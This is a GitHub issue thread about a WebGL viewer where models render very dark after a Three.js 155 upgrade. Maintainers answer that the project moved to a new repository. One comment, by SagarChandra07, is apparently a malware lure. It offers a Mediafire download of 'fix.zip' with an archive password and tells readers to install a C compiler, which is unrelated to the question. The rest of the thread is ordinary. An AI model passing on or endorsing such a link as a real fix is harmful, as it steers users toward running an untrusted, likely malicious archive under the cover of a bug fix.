### ISSUE TITLE
Upgrade Threejs version to 155

### ISSUE THREAD

**Issue by wwjje** [vimaec/vim-webgl-viewer#245]
Upgrading Threejs version to 155 makes the model very dark. How do I modify it?
![图片](https://github.com/user-attachments/assets/34f766a8-810d-46c7-a205-ec7a79f6ade0)

**Comment by SagarChandra07** [comment]
download
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive codepass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by mavimaec** [comment]
Hi @wwjje , just catching up on your issues here (we weren't getting notified of newly logged issues!). We'll be looking into upgrading our supported version of Threejs in the coming weeks.

**Comment by wwjje** [comment]
> 嗨，只是在这里赶上您的问题（我们没有收到新记录的问题的通知！我们将在未来几周内考虑升级我们支持的 Threejs 版本。

Thank you for your reply.I have raised a new issue, can it be implemented?[https://github.com/vimaec/vim-webgl-viewer/issues/258](url)

**Comment by mavimaec** [comment]
To simplify our development process, we have moved the content of this repository into the new repository: https://github.com/vimaec/vim-web where we have upgraded Threejs to the latest version.
